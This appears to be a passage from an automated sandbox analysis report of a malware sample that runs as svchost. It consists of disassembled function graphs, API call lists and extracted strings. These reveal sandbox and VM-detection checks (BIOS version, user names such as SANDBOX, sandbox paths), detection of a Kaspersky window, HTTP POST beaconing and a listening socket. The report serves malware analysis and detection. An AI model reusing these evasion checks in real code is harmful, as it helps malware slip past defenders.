                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02654D05
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02654D2C
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,00000004,00000000,?,?,00000000), ref: 02654D4D
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02654D66
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 02654D70
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001010,?,?,00000000), ref: 02654D83
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,00000000), ref: 02654D86
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654D9E
                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02654DBB
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 02654DDC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02654DEC
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02654DFB
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02654E0B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02654E14
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02654E1B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02654E2C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02654E33
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02654E41
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02654E44
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02654E51
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02654E54
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000004,?,?,00000000), ref: 02654E6A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 02654E7B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02654C6B
                                                                                                                                                                                                              • HTTP/1.0, xrefs: 02654C11
                                                                                                                                                                                                              • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02654BBD
                                                                                                                                                                                                              • Referer: http://www.google.com, xrefs: 02654C58
                                                                                                                                                                                                              • Content-Type: application/x-www-form-urlencoded, xrefs: 02654C42
                                                                                                                                                                                                              • GET, xrefs: 02654BF5
                                                                                                                                                                                                              • S:(ML;;NRNWNX;;;LW), xrefs: 02654D27
                                                                                                                                                                                                              • POST, xrefs: 02654BFE, 02654C17
                                                                                                                                                                                                              • 4864fbb3d37ea29, xrefs: 02654C66
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileHttpProcess$Request$Security$DescriptorFreeHeadersInternetmemset$HandleInfoOpenValidate$AllocAllocateCloseConnectConvertCreateInformationLocalLockNamedPointerQueryReadSaclSendStringUnlockWrite_snprintfmemcpy
                                                                                                                                                                                                              • String ID: 4864fbb3d37ea29$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1986934500-3861484182
                                                                                                                                                                                                              • Opcode ID: 74da92f41cdd45bcd2ac85d180216554ed19f00b2927f21ac3fbca8a936e53f5
                                                                                                                                                                                                              • Instruction ID: 462b9f8ae764ea14679ac551557c263ccc8e4401eee8051204216c4a1298545b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74da92f41cdd45bcd2ac85d180216554ed19f00b2927f21ac3fbca8a936e53f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17D1B471A40225BBEB209FA4CC49FEF7BA8AF48714F514658F906A72C0DB74D590CBA4
                                                                                                                                                                                                              Function 00402D30 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 157librarywindowCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 772 402d30-402d62 LoadLibraryA GetModuleFileNameA call 403a20 775 402d64-402d66 ExitProcess 772->775 776 402d6c-402d87 call 4021d0 call 4020e0 FindWindowA 772->776 781 402da1-402dbf call 402360 call 402450 call 402540 call 402680 IsUserAnAdmin 776->781 782 402d89-402d9b GetTickCount PostMessageA 776->782 791 402dc1-402dc8 call 401ea0 781->791 792 402de3-402dfb IsUserAnAdmin GetModuleHandleA 781->792 782->781 804 402dd2-402dd9 call 403560 791->804 805 402dca-402dcc ExitProcess 791->805 794 402e1c-402e20 792->794 795 402dfd-402e0d GetProcAddress 792->795 797 402e22-402e24 794->797 798 402e6e-402e70 794->798 795->794 796 402e0f-402e19 GetCurrentProcess 795->796 796->794 802 402e26-402e3a StrStrIA 797->802 803 402e3c-402e5a call 402930 GetCurrentProcessId call 401670 Sleep 797->803 800 402e76-402e8a StrStrIA 798->800 801 402efd-402f16 call 402930 GlobalFindAtomA 798->801 806 402ea1-402eb4 call 402a70 GlobalFindAtomA 800->806 807 402e8c-402e9c call 402930 call 4028d0 800->807 819 402f58-402f5a ExitProcess 801->819 820 402f18-402f27 GlobalAddAtomA IsUserAnAdmin 801->820 802->803 808 402e5f-402e69 call 402a70 call 4012b0 802->808 803->819 804->792 823 402ddb-402ddd ExitProcess 804->823 826 402ef6-402efb call 4012b0 806->826 827 402eb6-402ec5 GlobalAddAtomA IsUserAnAdmin 806->827 807->819 808->819 829 402f39-402f42 IsUserAnAdmin 820->829 830 402f29-402f31 820->830 826->819 834 402ed7-402ee0 IsUserAnAdmin 827->834 835 402ec7-402ecf 827->835 836 402f44 829->836 837 402f49-402f51 call 4015a0 829->837 830->829 840 402ee2 834->840 841 402ee7-402eef call 4015a0 834->841 835->834 836->837 837->819 845 402f53 call 401670 837->845 840->841 841->826 847 402ef1 call 401670 841->847 845->819 847->826
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                              • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                              • String ID: IsWow64Process$PnSw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3353599405-1027215798
                                                                                                                                                                                                              • Opcode ID: 21102898d184598221165a6fef4bec34bd79f3d1470297f61f252bfca23f0e31
                                                                                                                                                                                                              • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21102898d184598221165a6fef4bec34bd79f3d1470297f61f252bfca23f0e31
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD
                                                                                                                                                                                                              Function 02643A20 Relevance: 61.8, APIs: 22, Strings: 13, Instructions: 514threadmemorynativeCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 850 2643a20-2643a3f 851 2643a45-2643a4a 850->851 852 2644078-2644083 850->852 851->852 853 2643a50-2643a55 851->853 853->852 854 2643a5b-2643a60 853->854 854->852 855 2643a66-2643a6b 854->855 855->852 856 2643a71-2643a76 855->856 856->852 857 2643a7c-2643a9d 856->857 857->852 858 2643aa3-2643aa6 857->858 859 2643aff-2643b03 858->859 860 2643aa8-2643ad5 VirtualQuery 858->860 859->852 863 2643b09-2643b19 call 2643830 859->863 861 2643af5-2643afd 860->861 862 2643ad7-2643aec call 2665460 * 2 860->862 861->858 861->859 862->861 872 2643aee 862->872 863->852 869 2643b1f-2643b40 call 26438a0 VirtualAlloc 863->869 869->852 874 2643b46-2643b66 SymSetOptions GetCurrentProcess SymInitialize 869->874 872->861 875 2643ba3-2643ba5 874->875 876 2643b68-2643b9e GetCurrentProcess call 2643910 874->876 878 2643ba8-2643bad 875->878 876->875 878->878 879 2643baf-2643bb5 878->879 880 2643bb8-2643bbd 879->880 880->880 881 2643bbf-2643c5e call 2665460 * 2 GetLastError _snprintf call 2665460 880->881 888 2643c60-2643c7f call 2665460 * 2 881->888 889 2643cc2-2643cc6 881->889 888->889 903 2643c81-2643c84 888->903 890 2643d2d-2643d4e 889->890 891 2643cc8-2643ce3 GetCurrentThread ZwQueryInformationThread 889->891 894 2643d50-2643d56 890->894 891->890 893 2643ce5-2643ceb 891->893 897 2643cf0-2643cf6 893->897 894->894 898 2643d58-2643d80 894->898 897->897 900 2643cf8-2643d28 GetCurrentProcess call 2643910 897->900 901 2643d82-2643d85 898->901 902 2643dae-2643db1 898->902 900->890 901->902 906 2643d87-2643d8b 901->906 904 2643db4-2643db9 902->904 909 2643c85-2643c8b 903->909 904->904 910 2643dbb-2643dbd 904->910 907 2643da5-2643dac 906->907 908 2643d8d-2643d91 906->908 907->901 907->902 908->907 911 2643d93-2643da0 GetCurrentProcess call 2643910 908->911 909->909 912 2643c8d-2643cbf 909->912 913 2644067-2644072 VirtualFree 910->913 914 2643dc3-2643dc5 910->914 911->907 912->889 913->852 916 2643dd0-2643de0 914->916 916->916 917 2643de2-2643df4 PathAddBackslashA 916->917 918 2643df6-2643dfb 917->918 918->918 919 2643dfd-2643e07 918->919 920 2643e08-2643e0e 919->920 920->920 921 2643e10-2643e3c PathAddBackslashA call 2643080 call 2647980 920->921 926 2643e40-2643e50 921->926 926->926 927 2643e52-2643e5e PathAddBackslashA 926->927 928 2643e60-2643e65 927->928 928->928 929 2643e67-2643e6f 928->929 930 2643e70-2643e76 929->930 930->930 931 2643e78-2643ef4 GetDateFormatA GetTimeFormatA _snprintf 930->931 932 2643ef6-2643efb 931->932 932->932 933 2643efd-2643f07 932->933 934 2643f08-2643f0e 933->934 934->934 935 2643f10-2643f1e 934->935 936 2643f20-2643f30 935->936 936->936 937 2643f32-2643f3e PathAddBackslashA 936->937 938 2643f40-2643f45 937->938 938->938 939 2643f47-2643f51 938->939 940 2643f52-2643f58 939->940 940->940 941 2643f5a-2643f6f 940->941 942 2643f70-2643f76 941->942 942->942 943 2643f78-2643f9f call 2644b00 942->943 946 2643fa0-2643fb0 943->946 946->946 947 2643fb2-2643fbe PathAddBackslashA 946->947 948 2643fc0-2643fc5 947->948 948->948 949 2643fc7-2643fd1 948->949 950 2643fd2-2643fd8 949->950 950->950 951 2643fda-2643fef 950->951 952 2643ff0-2643ff6 951->952 952->952 953 2643ff8-2644025 call 26654a0 call 26472e0 952->953 953->913 958 2644027-264402f 953->958 959 2644030-2644035 958->959 959->959 960 2644037-2644057 call 2647620 call 2647310 PathAddBackslashA call 26539d0 959->960 966 264405c-2644062 call 26479c0 960->966 966->913
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02643ACA
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,?), ref: 02643B33
                                                                                                                                                                                                              • SymSetOptions.DBGHELP(00000006), ref: 02643B48
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000001), ref: 02643B58
                                                                                                                                                                                                              • SymInitialize.DBGHELP(00000000), ref: 02643B5B
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 02643B9A
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 02643C27
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02643C47
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02643CD4
                                                                                                                                                                                                              • ZwQueryInformationThread.NTDLL(00000000), ref: 02643CDB
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 02643D20
                                                                                                                                                                                                                • Part of subcall function 02665460: VirtualQuery.KERNEL32(02665460,?,0000001C,?,?,?,02643BC8), ref: 02665488
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Self exception = TRUE, xrefs: 02643C8D
                                                                                                                                                                                                              • csm, xrefs: 02643A45
                                                                                                                                                                                                              • DEBUG, xrefs: 0264404D
                                                                                                                                                                                                              • debug_%s_%s.log, xrefs: 02643ED4
                                                                                                                                                                                                              • CallStack:, xrefs: 02643D58
                                                                                                                                                                                                              • ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 02643C3E
                                                                                                                                                                                                              • sysinfo.log, xrefs: 02643F78
                                                                                                                                                                                                              • scr.bmp, xrefs: 02643FF8
                                                                                                                                                                                                              • ExceptionAddress = , xrefs: 02643B68
                                                                                                                                                                                                              • main, xrefs: 02643BEE
                                                                                                                                                                                                              • ThreadStart = , xrefs: 02643CF8
                                                                                                                                                                                                              • HH;mm;ss, xrefs: 02643EB2
                                                                                                                                                                                                              • dd;MMM;yyyy, xrefs: 02643E8B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Current$ProcessQueryVirtual$Thread$AllocErrorInformationInitializeLastOptions_snprintf
                                                                                                                                                                                                              • String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log
                                                                                                                                                                                                              • API String ID: 2913300210-1369666974
                                                                                                                                                                                                              • Opcode ID: d8819c3c7203c3142ea6466feb8f752870938f3ea0772495d107c86b408934ce
                                                                                                                                                                                                              • Instruction ID: 8ed0741a17fa65c4d4c2768f544a816c620f767a5b5e008a9ebb7ae930f245f5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8819c3c7203c3142ea6466feb8f752870938f3ea0772495d107c86b408934ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2212F931A006059FDB14DF68C894BAEBBF6FF49304F658699E88ADB340DF31A954CB40
                                                                                                                                                                                                              Function 00403A20 Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 134registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1182 403a20-403a68 RegOpenKeyExA 1183 403a6a-403a8d RegQueryValueExA 1182->1183 1184 403acd-403b05 GetUserNameA CharUpperA strstr 1182->1184 1187 403a9b-403aac RegCloseKey 1183->1187 1188 403a8f-403a99 RegCloseKey 1183->1188 1185 403beb 1184->1185 1186 403b0b-403b1e strstr 1184->1186 1190 403bec-403bf2 1185->1190 1186->1185 1189 403b24-403b37 strstr 1186->1189 1187->1184 1191 403aae-403ab5 1187->1191 1188->1184 1189->1185 1192 403b3d-403b7b GetSystemWindowsDirectoryA GetVolumeInformationA 1189->1192 1191->1184 1193 403ab7-403abe 1191->1193 1192->1185 1194 403b7d-403b82 1192->1194 1193->1184 1195 403ac0-403ac7 1193->1195 1194->1185 1196 403b84-403b89 1194->1196 1195->1184 1195->1190 1196->1185 1197 403b8b-403b90 1196->1197 1197->1185 1198 403b92-403b97 1197->1198 1198->1185 1199 403b99-403bc3 GetModuleFileNameA StrStrIA 1198->1199 1199->1185 1200 403bc5-403bd5 StrStrIA 1199->1200 1200->1185 1201 403bd7-403be7 StrStrIA 1200->1201 1201->1185 1202 403be9 1201->1202 1202->1185
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                              • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                              • API String ID: 1431998568-3499098167
                                                                                                                                                                                                              • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98
                                                                                                                                                                                                              Function 02659E40 Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 161threadnetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1203 2659e40-2659eba WSAStartup 1204 2659ec4-2659ed9 socket 1203->1204 1205 2659ebc-2659ebe ExitThread 1203->1205 1206 2659ee3-2659f1d htons * 2 bind 1204->1206 1207 2659edb-2659edd ExitThread 1204->1207 1208 2659f27-2659f3a listen 1206->1208 1209 2659f1f-2659f21 ExitThread 1206->1209 1210 2659f44-2659f53 gethostname 1208->1210 1211 2659f3c-2659f3e ExitThread 1208->1211 1212 2659f55-2659f64 gethostbyname 1210->1212 1213 2659fcb-2659fe3 accept 1210->1213 1212->1213 1214 2659f66-2659f6c 1212->1214 1215 2659fe5-2659ff9 getpeername 1213->1215 1216 265a044-265a046 ExitThread 1213->1216 1214->1213 1217 2659f6e-2659f72 1214->1217 1218 265a011-265a027 CreateThread 1215->1218 1219 2659ffb-265a00b inet_ntoa htons 1215->1219 1220 2659f76-2659fc5 inet_ntoa 1217->1220 1221 265a04c-265a055 closesocket ExitThread 1218->1221 1222 265a029-265a042 CloseHandle accept 1218->1222 1219->1218 1220->1220 1223 2659fc7 1220->1223 1222->1215 1222->1216 1223->1213
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExitThread$Startupsocket
                                                                                                                                                                                                              • String ID: login$pass
                                                                                                                                                                                                              • API String ID: 1705285421-2248183487
                                                                                                                                                                                                              • Opcode ID: 09e0c34fec8ba3fbcccd5522702ba7315aaed267b97850b175a075630240cda1
                                                                                                                                                                                                              • Instruction ID: da11250c48dd2e4306b0a92d062d898681d69426ba08aaf8731a22b9a0e196ba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09e0c34fec8ba3fbcccd5522702ba7315aaed267b97850b175a075630240cda1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3516D75948300EFD300DF64DC88B6E7BE5BB88715F409B19F956972C0D7709894CBA2
                                                                                                                                                                                                              Function 026579D0 Relevance: 40.8, APIs: 27, Instructions: 286memorytimesleepCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1238 26579d0-26579df 1239 26579e1-26579ec call 26578a0 1238->1239 1242 2657db3-2657dbb Sleep 1239->1242 1243 26579f2-26579fa 1239->1243 1242->1239 1244 2657ae6 1243->1244 1245 2657a00-2657a3e OpenProcess 1243->1245 1246 2657aea-2657b35 OpenProcess 1244->1246 1247 2657a40-2657a60 GetProcessTimes 1245->1247 1248 2657a9a-2657aa9 EnterCriticalSection 1245->1248 1249 2657b37-2657b54 GetProcessTimes 1246->1249 1250 2657b88-2657b99 EnterCriticalSection 1246->1250 1251 2657a70-2657a74 1247->1251 1252 2657a62-2657a6e 1247->1252 1253 2657ab0-2657ab7 1248->1253 1254 2657b56-2657b60 1249->1254 1255 2657b62 1249->1255 1257 2657bb3-2657c63 LeaveCriticalSection VirtualQuery * 2 1250->1257 1258 2657b9b 1250->1258 1256 2657a78-2657a8a GetHandleInformation 1251->1256 1252->1256 1259 2657ab9-2657abd 1253->1259 1260 2657ad8 1253->1260 1262 2657b66-2657b78 GetHandleInformation 1254->1262 1255->1262 1256->1248 1263 2657a8c-2657a91 1256->1263 1266 2657c65-2657c7c call 2664cc0 1257->1266 1264 2657ba0-2657ba7 1258->1264 1259->1253 1265 2657abf-2657ad6 LeaveCriticalSection call 2657810 1259->1265 1261 2657ada-2657adc 1260->1261 1261->1245 1268 2657ae2 1261->1268 1262->1250 1269 2657b7a-2657b7f 1262->1269 1263->1248 1270 2657a93-2657a94 CloseHandle 1263->1270 1271 2657bad-2657bb1 1264->1271 1272 2657d6f-2657d7b 1264->1272 1265->1261 1278 2657c84-2657cab EnterCriticalSection GetProcessHeap HeapAlloc 1266->1278 1279 2657c7e-2657c82 1266->1279 1268->1244 1269->1250 1275 2657b81-2657b82 CloseHandle 1269->1275 1270->1248 1271->1257 1271->1264 1272->1246 1276 2657d81 1272->1276 1275->1250 1280 2657d85-2657d89 1276->1280 1282 2657d64-2657d69 LeaveCriticalSection 1278->1282 1283 2657cb1-2657cf8 OpenProcess 1278->1283 1279->1266 1279->1278 1280->1242 1281 2657d8b-2657d9e GetProcessHeap HeapValidate 1280->1281 1284 2657da0-2657da9 GetProcessHeap HeapFree 1281->1284 1285 2657daf-2657db1 1281->1285 1282->1272 1286 2657d4f-2657d5e 1283->1286 1287 2657cfa-2657d17 GetProcessTimes 1283->1287 1284->1285 1285->1242 1285->1280 1286->1282 1288 